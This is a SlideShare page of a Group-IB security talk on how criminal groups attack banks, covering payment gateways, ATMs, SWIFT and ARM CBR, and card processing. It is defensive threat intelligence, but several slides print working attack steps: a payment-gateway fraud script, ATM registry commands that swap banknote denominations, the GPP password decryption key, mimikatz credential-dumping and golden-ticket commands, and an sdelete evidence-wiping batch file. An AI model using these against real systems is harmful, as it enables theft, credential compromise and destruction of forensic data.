Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Хакеры хотят ваш банк больше, чем ваших клиентов


Published on

Докладчик проведет покейсовый разбор нескольких инцидентов с банкоматами, платежными шлюзами, карточным процессингом, системами межбанковских переводов, опишет тактику атакующих из разных стран для получения доступа в локальную сеть банка и расскажет про приемы, используемые хакерами для повышения привилегий в локальной сети. Продемонстрирует ошибки атакующих, расскажет, как выявить их активность и предотвратить вывод инфраструктуры банка из строя или похитить деньги. Слушатели узнают, кто будет атаковать финансовые учреждения в будущем, что атакующие будут использовать и как заметать следы.

Published in: Technology
  • Be the first to comment

Хакеры хотят ваш банк больше, чем ваших клиентов

  1. 1. GROUP-IB.COM 11 Hackers want your bank more than your customers: The evolution of targeted attacks on financial institutions
  2. 2. GROUP-IB.COM 22 Who are the attackers?
  3. 3. GROUP-IB.COM Timeline *Cobalt was detected in June 3
  4. 4. GROUP-IB.COM Who are they? What are their favorite targets? KNOWN TARGETED ATTACKERS Buhtrap ARM CBR (SWIFT analog) Сobalt ATM, Card processing, SWIFT Corkow Trading terminals, Card processing, ATM Anunak Internet banking, ARM CBR, SWIFT, Payment gateways, Card processing, ATM Lurk ARM CBR (SWIFT analog) 4
  5. 5. GROUP-IB.COM 5 FUTURE TARGETED ATTACKERS • Toplel • Ranbyus • RTM • Vawtrak • Dridex Balance is 500 thousand pounds, inter-UK, for money mules (now such money mules now). Skip for now. Account for authorization of payments, balance is 2 million pounds No function of payment approval. Balance is 18 million pounds. Tried to transfer 2 million to China Balance is 15 million pounds, dual authorization off. No opportunity to establish sort code for transfer. It is better to ring out Future Attackers after your network
  6. 6. GROUP-IB.COM 66 What are the targets?
  7. 7. GROUP-IB.COM Targets: Corporate internet banking software • Compromise operator workstations of corporate accounts • Listing companies with high balances • Generating new digital signatures for each company • Transactions from corporate accounts signed with new digital signatures 7 Access to corporate internet banking enables criminals to steal from TOP clients. Anunak used this method in 2013-2014.
  8. 8. GROUP-IB.COM Targets: Payment gateways $ses = date("Ymdhis"); $url = " bin/DealerSertification/de_pay.cgi"; $data_string = "SD=XXXXXX&AP=XXXXXX&OP=XXXXX&SESSION=".$ses."&COMM ENT=Test&NUMBER=9642065662&AMOUNT_ALL=10.0&AMOUNT =10.0"; $ch = curl_init(); curl_setopt($ch,CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded','Content-Length: '.strlen($data_string))); curl_setopt($ch, CURLOPT_POSTFIELDS, "inputmessage=0000038801SM000001270000012700000125&".$ data_string); $result = curl_exec($ch); var_dump($result); • Once inside, hackers search for payment gateways • Obtain log files from payment gateways to understand the typical format of communication • Start SOCKS proxies on internal hosts to enable communication with payment gateways • Run scripts to replenish attacker’s phone balances in thousands of transactions • Transfer money from phones to cards and cash out 8 Payment gateways enables high frequency, low amount transfers. Very hard to stop and return money.
  9. 9. GROUP-IB.COM Targets: ATM • Hackers Identify ATM manufactures • They detect physical ATM locations • Upload from internal network to ATM • Jackpot with diagnostic tools • Jackpot with custom malicious programs for specific ATMs 9 ATM heists – the easiest way to launder money. Cobalt used malware to withdraw bags cash totalling $2.6m from 41 ATMS in Taiwan.
  10. 10. GROUP-IB.COM Targets: Trade terminals • The attack lasted only 14 minutes • $437 million in purchases (5 trades ) • $97 million sold (2 trades) • 55 to 66 Rubles — volatility in exchange rate 10 Corkow conducted the first successful attack on broker terminals in 2015.
  11. 11. GROUP-IB.COM Targets: Trade terminals 11
  12. 12. GROUP-IB.COM Targets: ARM CBR or SWIFT SWIFT [ROOT_DRIVE]:UsersAdministratorAppDataLocalAlliansmcmin [ROOT_DRIVE]:UsersAdministratorAppDataLocalAlliansmcmout ARM CBR [ROOT_DRIVE]:uarm3exqinc [ROOT_DRIVE]:uarm3exqout • Identify working directory of SWIFT or ARM CBR application • Replace payment details with fraudster’s information • Intercept confirmation messages to bypass identification of fraudulent transactions 12
  13. 13. GROUP-IB.COM Targets: Card processing • Legally open bank cards in the same bank or buy new cards on dark market (usually about 30 cards) • Remove or increase withdraw limits • Remove overdraft limits (even for debit cards) • Cash out using these cards in other countries 13 Cobalt, Corkow, Anunak have been conducting these attacks since 2014. It provides very important cash-out benefits.
  14. 14. GROUP-IB.COM 1414 Malware delivery
  15. 15. GROUP-IB.COM Malware Delivery: Driveby GROUPS WHICH HAVE USED THIS METHOD: • Anunak • Corkow • Buhtrap • Lurk 800 000+ total visitor per day 11% average exploit success rate 90 000 possible infections per day 15
  16. 16. GROUP-IB.COM Malware Delivery: Custom pay-per-install GROUPS WHICH HAVE USED THIS METHOD: • Anunak #!/usr/bin/python # -*- coding: utf-8 -*- import os from bulkwhois.shadowserver import BulkWhoisShadowserver iplist_file = 'ip.txt' path = os.path.dirname(os.path.abspath(__file__)) bulk_whois = BulkWhoisShadowserver() iplist = [] with open(os.path.join(path, iplist_file)) as f: for line in f: iplist.append(line.strip()) result = bulk_whois.lookup_ips(iplist) with open(os.path.join(path, 'data.txt'), 'a') as f: for record in result: f.write('IP: %s CC: %s Org. Name: %s Register: %s AS Name: %s BGP Prefix: %s ------------------------------------------------------- ' % (result[record]['ip'], result[record]['cc'], result[record]['org_name'], result[record]['register'], result[record]['as_name'], result[record]['bgp_prefix'])) 16 WHAT THEY DID: • Contact botnet owner • Ask to provide IPs of infected machines • Check IP list with script • Check for records related to financial institutions • Ask botnet owner to install new trojan
  17. 17. GROUP-IB.COM Malware Delivery: Web hack 17 GROUPS WHICH HAVE USED THIS METHOD: • Anunak and individual hackers in 2013, 2014, 2015 WHAT THEY DO: • Identify SQL injection • Do EXEC in SQL request to gather information about net environment • Upload files on server with echo command downloading from remote host with Meterpreter • Upload mimikatz on the Domain Controller • Create hidden tunnels
  18. 18. GROUP-IB.COM Malware Delivery: Phishing Emails GROUPS WHICH HAVE USED THIS METHOD: • Anunak • Buhtrap • Lurk • Cobalt • MoneyTaker METHODS TO ENSURE DOCUMENTS ARE OPENED: • Mass mailing to corporate email addresses • Calls to bank managers • Hacking bank clients • Hacking bank partners ATTACHMENTS: • Executables • Executables in encrypted archive • Document with exploits • Document with malicious macros 18
  19. 19. GROUP-IB.COM Malware Delivery: Spear phishing with faked sender address ADVANTAGES DISADVANTAGES • Easy to start • Unlimited list of brands • No need to register domains • Less traces for the investigation • High level of trust for users • Hard to detect if email delivered to end user • Don’t pass Sender Policy Framework (SPF) check • Low delivery percent 19
  20. 20. GROUP-IB.COM ADVANTAGES DISADVANTAGES • Can bypass Sender Policy Framework (SPF) check • New TLD allows registering very similar domains • High percent of delivery • Vigilant users can detect it • Additional traces for investigation Malware Delivery: Spear phishing with faked sender address 20
  21. 21. GROUP-IB.COM Malware Delivery: Spear phishing from compromised partner ADVANTAGES DISADVANTAGES • Almost 100% delivery with correct attachment • High percent of opening by users from contact list • No need to rent server and register domains • Limited by region where partner is located 21
  22. 22. GROUP-IB.COM Tools to create malicious documents Microsoft Word Intruder (MWI) OffensiveWare Multi Exploit Builder (OMEB) 22
  23. 23. GROUP-IB.COM The attack scheme 23
  24. 24. GROUP-IB.COM 2424 What they do inside your network
  25. 25. GROUP-IB.COM Legal Software vs. Private Tools New trend: Hackers Use Legal Software for Their Attacks PRIVATE TOOLS LEGAL SOFTWARE + – Legal attack framework has become very effective. Special trojans are not necessary anymore. • Unknown before first public research • Adjusted to the needs of the group • Easy to use • Inexperienced attackers can be involved • Investments in development are needed • High cost of ownership • Becomes known quickly • Dependency on developers • Attracts attention • Easier to attribute incidents and threat actors • Simplifies the process of investigation • Hard to track such attacks • Difficult to link different incidents • Less traces to investigate • Difficult to detect in a local network • Higher qualification • Many solutions are DIY • Difficult to attack several targets simultaneously 25
  26. 26. GROUP-IB.COM KSC as a tool for provisioning the malware 26
  27. 27. GROUP-IB.COM KSC as a tool for provision of the RMS and scanning server 27
  28. 28. GROUP-IB.COM Gaining privileges DOMAIN CONTROLLER CONFIGURATION ERROR • Using Group Policy Preferences (GPP) • [server_name]sysvol[domain_name]Policies[group_policy_nam e]MachinePreferencesGroupsGroups.xml • The perpetrators extract domain administrator credentials from the cpassword and userName fields in the Groups.xml file (the password is encrypted using the AES-256 algorithm and further coded using Base64 encoding). • To obtain an unencrypted password the attackers decode it using Base64. • This password is then decrypted using the key 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b 66c1b. 28
  29. 29. GROUP-IB.COM Gaining privileges MIMIKATZ If the attackers have access to a domain controller mimikatz sekurlsa::logonpasswords If the attackers have local root privileges without access to a domain controller The attackers connect to workstations and servers in order to find a user with access to the domain controller. The attack pass-the-hash can be performed. 29
  30. 30. GROUP-IB.COM Gaining privileges MIMIKATZ If the attackers do not have local administrator rights Exploiting the operating system vulnerabilities CVE-2014-4113, CVE-2015-1701, CVE-2015-2363 and CVE-2015-2426 enables the criminal to gain SYSTEM level privileges in x32 and x64 operating systems. The malware connects to hosts andcheck them for necessary vulnerabilities. MIMIKATZ GOLDEN TICKET • "privilege::debug" "lsadump::samrpc /patch" exit • extracting NTLM hash of the krbtgt account (Key Distribution Center Service Account) • creating a file with a gold TGT ticket 30
  31. 31. GROUP-IB.COM Tools to research the network netscan.exe – a network scanner NetScan patch86.exe – a Termsrv patch to support simultaneous terminal sessions (KEY indicator) plink.exe – an ssh console client for Windows psexec.exe – a remote console for Windows 31
  32. 32. GROUP-IB.COM Tools to research the network REMOTE ADMINISTRATION TOOLS: • AmmyAdmin • TeamViewer or TVRat • Hamachi LogMeIn • RMS • LightManager • HidenVNC • Hidden channel over SMB, DNS, HTTPS 32
  33. 33. GROUP-IB.COM Provision of the trojan survivability 33
  34. 34. GROUP-IB.COM 34 Tools to used to complete attacks
  35. 35. GROUP-IB.COM Change denomination of withdrawal banknotes .bat file from ATM Registry key name Value VALUE_1 5000 VALUE_2 1000 VALUE_3 500 VALUE_4 100 • Remote access to ATM from internal network • Launch .bat script that changed registry keys • Money mule came to the ATM and withdraw cash from its bank account • During withdraw he set small denominations • Instead of small denominations the ATM spit out big denominations from wrong cassette REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_1 /t REG_SZ /d "5000" /f REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_2 /t REG_SZ /d "1000" /f REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_3 /t REG_SZ /d "500" /f REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_4 /t REG_SZ /d "100" /f REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_1 /t REG_SZ /d "100" /f REG ADD "HKEY_LOCAL_MACHINESOFTWAREWincor NixdorfProTopasCurrentVersionLYNXPARCASH_DISPENSER" /v VALUE_4 /t REG_SZ /d "5000" /f shutdown -r -t 0 -f 35
  36. 36. GROUP-IB.COM Modified diagnostic tools • Attackers disabled the KDIAG function responsible for checking if the door is open. • Uploaded a modified version of KDIAG to the ATM and sent the command to withdraw cash • At the same time, a money mule came to the ATM with an open bag to grab money 36
  37. 37. GROUP-IB.COM Software for attacks on ATMs ServiceLogicalName — a service name used as an argument for the WFSOpen function (for example, “Cash Dispenser Module”). Cassettes Count — the total number of cassettes on the device. The value should be set in the interval from 1 to 15. Cassette Number — the number of the cassette, which should dispense cash. The value should be set in the interval from 1 to 15. Banknotes Count — the amount of banknotes to be dispensed from the cassette. The value should be set in the interval from 1 to 60. Dispenses Count — the number of times cash dispenses should be repeated. The value should be set in the interval from 1 to 60. A malicious program that uses standard functions for the XFS interface via the XFS Manager (eXtensions for Financial Services). 37
  38. 38. GROUP-IB.COM Outward Telegraphic Transfer Comm & Charges MD5 6D355FFA06AE39FC8671CC8AC38F984E Searches files in catalog: D:WIN32APPSWIFTALLIANCESERVERBatchOutgoingHKHKAcksBak In this instance, «Outgoing» signifies outgoing transactions, «HK» signifies Hong Kong, accordingly the program searches for transactions to Hong Kong banks. If file is bigger than 102400 bytes it then attaches into file C:TempMsglog.txt «Too big file <file name> : <file size> > 102400rn», it opens and will search substrings: «OTTC605384», «OTTC605385», «OTTC601386», «OTTC601387», «OTTC605381», «OTTC605382» If a file contains this substring, then it writes into log C:TempMsglog.txt the following string «Found file: %s with required token: <founded substring>rn» and copies this file into directory «C:TempMsg» Then it goes into standby mode each 2.5 seconds, and then repeats the search of the substring. Hong Kong-based FI OTTC605384 OTTC605385 OTTC601386 OTTC601387 OTTC605381 OTTC605382 38
  39. 39. GROUP-IB.COM ARM CBR (SWIFT analoge) MONEYTAKER V5.0 Four modules: Main – launch other modules with parameters specified in main config file AutoReplacer (XmlBin) – replaces in ARM CBR directory payment details. Results of replacement writes to Xml-Resultfile. Do not change SUM field to avoid detection. Hiding (EdBin) – checks for incoming/confirmation messages. It checks for field «PayeePersonalAcc» and compare it with «HackAcc» in from Xml-Resultfile. If the values match, then hiding module restore original PayeePersonalAcc field. Temp (TxtBin) – unknown. Xml-Resultfile # # Id= OrigAcc= OrigBic= OrigCor= Purpose= HackAcc= HackBic= HackCor= Sum= PayerPersonalAcc= # # 39
  40. 40. GROUP-IB.COM Software to clean evidences DEL.BAT sdelete.exe -accepteula -p 32 d2.exe sdelete.exe -accepteula -p 32 xtl.exe sdelete.exe -accepteula -p 32 *.txt sdelete.exe -accepteula -p 32 d2s.exe del sdelete.exe del del.bat The del.bat script launches the SDelete program, which is designed to delete files in a special manner making it impossible to recover them with a forensic investigation. MBR KILLER Program deletes Master boot record (MBR) 40
  41. 41. GROUP-IB.COM Future More criminal groups Targeted attacks is a new call for attackers who know about banks and money laundering More attacks Global landscape, ready to use tools, technics and tactics allows to be more effective. Legal software We will see much more attacks with use if legal software without private trojans. Harder to attribute and investigate Legal software in attacks will force us to change attribution and investigation procedures. 41
  42. 42. GROUP-IB.COM 4242 Questions?
  43. 43. GROUP-IB.COM 4343 E-mail Web site Facebook Twitter